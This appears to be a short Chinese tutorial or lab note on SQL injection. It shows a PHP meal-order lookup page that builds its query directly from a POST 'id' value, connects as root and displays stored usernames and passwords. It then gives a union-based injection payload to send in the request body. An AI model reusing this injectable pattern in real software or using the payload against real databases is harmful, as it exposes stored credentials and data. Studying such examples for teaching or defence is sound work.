贴出php代码
<html>
<body>
<?php
$con = mysql_connect("localhost","root","root");
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
else
{
mysql_select_db("test");
$id = $_POST['id'];
$query ="select * from zhuru where Id=$id";
$result = mysql_query($query);
$info= mysql_fetch_array($result);
$re_num = mysql_num_rows($result);
if($info==FALSE)
{
echo "抱歉,您的订餐信息没有查到!";
}
else
{
echo "<form action='index.php' method='post' name='chakanform'>";
echo "<table>";
echo "<tr>";
echo "<h3>你的订餐记录是:</h3>";
echo "</tr>";
echo "<tr>";
echo "<td>";
echo "序号:";
echo "</td>";
echo "<td>";
echo "菜品:";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "</tr>";
do
{
$xuhao++;
echo "<tr>";
echo "<td>";
echo $xuhao;
echo "</td>";
echo "<td>";
echo $info[username];
echo "</td>";
echo "<td>";
echo $info[password];
echo "</td>";
echo "<td>";
echo $info[id];
echo "</td>";
echo "<td>";
echo $info[tushu];
echo "</td>";
echo "<td>";
echo $info[dizhi];
echo "</td>";
echo "</tr>";
}
while($info= @mysql_fetch_array($result));
echo "</table>";
echo "</form>";
}
mysql_close($con);
}
?>
</body>
</html>
注意添加消息头
配置如上
然后修改正文的内容
id=1 and 1=2 union select 1,2,3,4,database()
进行注入即可